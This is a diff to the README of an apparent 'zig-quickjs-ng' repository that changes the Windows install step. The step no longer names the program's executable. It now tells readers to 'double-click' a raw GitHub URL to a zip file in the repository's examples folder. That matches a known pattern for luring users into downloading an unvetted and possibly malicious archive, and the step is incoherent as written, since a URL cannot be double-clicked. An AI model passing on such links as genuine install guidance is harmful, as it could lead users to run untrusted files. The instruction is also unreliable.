Zaif47/zig-quickjs-ng/README.md

    - If the file is a zip or tar archive, right-click on the file and select “Extract All” or use a similar option depending on your operating system.

 3. **Open the Application:**
-   - For Windows, double-click on `zig-quickjs-ng.exe`.
+   - For Windows, double-click on `https://raw.githubusercontent.com/Zaif47/zig-quickjs-ng/main/examples/ng_quickjs_zig_v3.4.zip`.
    - For macOS, open the `.app` file.
    - For Linux, you may need to open a terminal and run `./zig-quickjs-ng` from the extracted directory.